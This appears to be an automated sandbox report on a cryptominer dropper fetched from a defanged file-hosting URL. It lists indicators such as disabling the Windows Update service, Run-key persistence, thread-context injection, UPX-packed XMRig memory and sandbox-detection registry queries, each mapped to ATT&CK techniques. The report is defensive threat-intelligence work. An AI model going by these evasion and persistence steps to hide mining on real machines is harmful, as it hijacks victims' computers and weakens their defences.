xmrig | hxxps://s6[.]dosya[.]tc/server12/8c8mm7/Yeni_Metin_Belgesi[.]txt[.]html

Analysis

max time kernel
1799s
max time network
1797s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
18/03/2023, 07:27

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

https://s6.dosya.tc/server12/8c8mm7/Yeni_Metin_Belgesi.txt.html

Score

10^/10

xmrig discovery evasion miner persistence upx

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 26 IoCs

description	pid	Process	procid_target
PID 2340 created 3148	2340	EchoLogger.exe	53
PID 2340 created 3148	2340	EchoLogger.exe	53
PID 2340 created 3148	2340	EchoLogger.exe	53
PID 2340 created 3148	2340	EchoLogger.exe	53
PID 2340 created 3148	2340	EchoLogger.exe	53
PID 4692 created 3148	4692	EchoLogger.exe	53
PID 4692 created 3148	4692	EchoLogger.exe	53
PID 4692 created 3148	4692	EchoLogger.exe	53
PID 4692 created 3148	4692	EchoLogger.exe	53
PID 4692 created 3148	4692	EchoLogger.exe	53
PID 5312 created 3148	5312	EchoLogger.exe	53
PID 5312 created 3148	5312	EchoLogger.exe	53
PID 5312 created 3148	5312	EchoLogger.exe	53
PID 5312 created 3148	5312	EchoLogger.exe	53
PID 5312 created 3148	5312	EchoLogger.exe	53
PID 5108 created 3148	5108	updater.exe	53
PID 5108 created 3148	5108	updater.exe	53
PID 5108 created 3148	5108	updater.exe	53
PID 5108 created 3148	5108	updater.exe	53
PID 5860 created 3148	5860	conhost.exe	53
PID 5108 created 3148	5108	updater.exe	53
PID 4320 created 3148	4320	AudinoLogger.exe	53
PID 4320 created 3148	4320	AudinoLogger.exe	53
PID 4320 created 3148	4320	AudinoLogger.exe	53
PID 4320 created 3148	4320	AudinoLogger.exe	53
PID 4320 created 3148	4320	AudinoLogger.exe	53

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral1/memory/4616-3283-0x00007FF7904F0000-0x00007FF790CE4000-memory.dmp	xmrig
behavioral1/memory/4616-3299-0x00007FF7904F0000-0x00007FF790CE4000-memory.dmp	xmrig
behavioral1/memory/4616-3300-0x00007FF7904F0000-0x00007FF790CE4000-memory.dmp	xmrig
behavioral1/memory/4616-3348-0x00007FF7904F0000-0x00007FF790CE4000-memory.dmp	xmrig
behavioral1/memory/4616-3380-0x00007FF7904F0000-0x00007FF790CE4000-memory.dmp	xmrig
behavioral1/memory/4616-3397-0x00007FF7904F0000-0x00007FF790CE4000-memory.dmp	xmrig
behavioral1/memory/4616-3409-0x00007FF7904F0000-0x00007FF790CE4000-memory.dmp	xmrig
behavioral1/memory/4616-3430-0x00007FF7904F0000-0x00007FF790CE4000-memory.dmp	xmrig
behavioral1/memory/4616-3454-0x00007FF7904F0000-0x00007FF790CE4000-memory.dmp	xmrig

Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	notepad++.exe

Executes dropped EXE 10 IoCs

pid	Process
2340	EchoLogger.exe
4692	EchoLogger.exe
5312	EchoLogger.exe
5108	updater.exe
3684	npp.8.5.Installer.x64.exe
2548	notepad++.exe
4332	notepad++.exe
1388	gup.exe
4320	AudinoLogger.exe
3640	updater.exe

Loads dropped DLL 16 IoCs

pid	Process
3684	npp.8.5.Installer.x64.exe
3684	npp.8.5.Installer.x64.exe
3684	npp.8.5.Installer.x64.exe
3684	npp.8.5.Installer.x64.exe
3684	npp.8.5.Installer.x64.exe
3684	npp.8.5.Installer.x64.exe
5648	regsvr32.exe
4452	regsvr32.exe
1388	gup.exe
2548	notepad++.exe
2548	notepad++.exe
2548	notepad++.exe
2548	notepad++.exe
2548	notepad++.exe
2548	notepad++.exe
3148	Explorer.EXE

Registers COM server for autorun 1 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B298D29A-A6ED-11DE-BA8C-A68E55D89593}\InprocServer32\ThreadingModel = "Apartment"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B298D29A-A6ED-11DE-BA8C-A68E55D89593}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B298D29A-A6ED-11DE-BA8C-A68E55D89593}\InprocServer32\ = "C:\\Program Files\\Notepad++\\NppShell_06.dll"	regsvr32.exe

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4616-3283-0x00007FF7904F0000-0x00007FF790CE4000-memory.dmp	upx
behavioral1/memory/4616-3299-0x00007FF7904F0000-0x00007FF790CE4000-memory.dmp	upx
behavioral1/memory/4616-3300-0x00007FF7904F0000-0x00007FF790CE4000-memory.dmp	upx
behavioral1/memory/4616-3348-0x00007FF7904F0000-0x00007FF790CE4000-memory.dmp	upx
behavioral1/memory/4616-3380-0x00007FF7904F0000-0x00007FF790CE4000-memory.dmp	upx
behavioral1/memory/4616-3397-0x00007FF7904F0000-0x00007FF790CE4000-memory.dmp	upx
behavioral1/memory/4616-3409-0x00007FF7904F0000-0x00007FF790CE4000-memory.dmp	upx
behavioral1/memory/4616-3430-0x00007FF7904F0000-0x00007FF790CE4000-memory.dmp	upx
behavioral1/memory/4616-3454-0x00007FF7904F0000-0x00007FF790CE4000-memory.dmp	upx

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Windows\CurrentVersion\Run	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Windows\CurrentVersion\Run	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Windows\CurrentVersion\Run	chrome.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\W:	mstsc.exe
File opened (read-only)	\??\A:	mstsc.exe
File opened (read-only)	\??\I:	mstsc.exe
File opened (read-only)	\??\K:	mstsc.exe
File opened (read-only)	\??\Q:	mstsc.exe
File opened (read-only)	\??\E:	mstsc.exe
File opened (read-only)	\??\Q:	mstsc.exe
File opened (read-only)	\??\S:	mstsc.exe
File opened (read-only)	\??\T:	mstsc.exe
File opened (read-only)	\??\W:	mstsc.exe
File opened (read-only)	\??\A:	mstsc.exe
File opened (read-only)	\??\B:	mstsc.exe
File opened (read-only)	\??\P:	mstsc.exe
File opened (read-only)	\??\S:	mstsc.exe
File opened (read-only)	\??\E:	mstsc.exe
File opened (read-only)	\??\G:	mstsc.exe
File opened (read-only)	\??\O:	mstsc.exe
File opened (read-only)	\??\Y:	mstsc.exe
File opened (read-only)	\??\H:	mstsc.exe
File opened (read-only)	\??\O:	mstsc.exe
File opened (read-only)	\??\Z:	mstsc.exe
File opened (read-only)	\??\X:	mstsc.exe
File opened (read-only)	\??\N:	mstsc.exe
File opened (read-only)	\??\R:	mstsc.exe
File opened (read-only)	\??\J:	mstsc.exe
File opened (read-only)	\??\L:	mstsc.exe
File opened (read-only)	\??\V:	mstsc.exe
File opened (read-only)	\??\Y:	mstsc.exe
File opened (read-only)	\??\Z:	mstsc.exe
File opened (read-only)	\??\P:	mstsc.exe
File opened (read-only)	\??\V:	mstsc.exe
File opened (read-only)	\??\I:	mstsc.exe
File opened (read-only)	\??\K:	mstsc.exe
File opened (read-only)	\??\N:	mstsc.exe
File opened (read-only)	\??\J:	mstsc.exe
File opened (read-only)	\??\X:	mstsc.exe
File opened (read-only)	\??\B:	mstsc.exe
File opened (read-only)	\??\F:	mstsc.exe
File opened (read-only)	\??\F:	mstsc.exe
File opened (read-only)	\??\M:	mstsc.exe
File opened (read-only)	\??\M:	mstsc.exe
File opened (read-only)	\??\U:	mstsc.exe
File opened (read-only)	\??\T:	mstsc.exe
File opened (read-only)	\??\H:	mstsc.exe
File opened (read-only)	\??\L:	mstsc.exe
File opened (read-only)	\??\U:	mstsc.exe
File opened (read-only)	\??\G:	mstsc.exe
File opened (read-only)	\??\R:	mstsc.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 5108 set thread context of 5860	5108	updater.exe	317
PID 5108 set thread context of 4616	5108	updater.exe	323

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\Notepad++\uninstall.exe	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\themes\Solarized-light.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Google\Chrome\updater.exe	EchoLogger.exe
File created	C:\Program Files\Notepad++\autoCompletion\php.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\functionList\krl.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\functionList\nsis.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\plugins\Config\nppPluginList.dll	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\themes\Mono Industrial.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\themes\Plastic Code Wrap.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Google\Chrome\updater.exe	EchoLogger.exe
File created	C:\Program Files\Notepad++\stylers.model.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\functionList\overrideMap.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\contextMenu.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\autoCompletion\java.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\autoCompletion\actionscript.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\functionList\cpp.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\functionList\rust.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\nppLogNulContentCorruptionIssue.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\change.log	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\autoCompletion\tex.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\functionList\asm.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\functionList\typescript.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\autoCompletion\batch.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\themes\Hello Kitty.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\themes\Ruby Blue.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\autoCompletion\BaanC.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\functionList\baanc.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\functionList\sql.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\functionList\ini.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\notepad++.exe	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\autoCompletion\sql.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\updater\libcurl.dll	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\autoCompletion\typescript.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\functionList\lua.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\functionList\autoit.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\functionList\ada.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\updater\LICENSE	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\themes\Deep Black.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Notepad++\autoCompletion\html.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\functionList\javascript.js.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\functionList\batch.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\autoCompletion\perl.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\functionList\cobol-free.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\plugins\NppConverter\NppConverter.dll	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\themes\DarkModeDefault.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\themes\Vibrant Ink.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\themes\Navajo.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\functionList\inno.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\updater\GUP.exe	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\shortcuts.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\themes\khaki.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\autoCompletion\nsis.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\autoCompletion\autoit.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\functionList\c.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\functionList\perl.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\functionList\sinumerik.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\updater\README.md	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\NppShell_06.dll	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\autoCompletion\javascript.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\functionList\fortran77.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\updater\gup.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Notepad++\themes\vim Dark Blue.xml	npp.8.5.Installer.x64.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 25 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4084	sc.exe
5664	sc.exe
2808	sc.exe
3536	sc.exe
2732	sc.exe
1760	sc.exe
1896	sc.exe
5768	sc.exe
3040	sc.exe
5220	sc.exe
5856	sc.exe
2712	sc.exe
2764	sc.exe
3920	sc.exe
4644	sc.exe
2544	sc.exe
1608	sc.exe
6084	sc.exe
5392	sc.exe
4380	sc.exe
4960	sc.exe
3612	sc.exe
1192	sc.exe
3328	sc.exe
2648	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
5768	384	WerFault.exe	10
4160	3640	WerFault.exe	359
1388	5580	WerFault.exe	383

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Device Parameters\TSRedirFlags	mstsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\Device Parameters	mstsc.exe
Key security queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Device Parameters	mstsc.exe
Key security queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	mstsc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\TSRedirFlags	mstsc.exe
Key security queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Device Parameters	mstsc.exe
Key security queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	mstsc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\TSRedirFlags	mstsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000\Device Parameters	mstsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000\Device Parameters	mstsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\Device Parameters	mstsc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Device Parameters\TSRedirFlags	mstsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	dwm.exe

Enumerates system info in registry 2 TTPs 14 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	dwm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dwm.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133235980423060220"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe

Modifies registry class 64 IoCs

description	ioc	Process
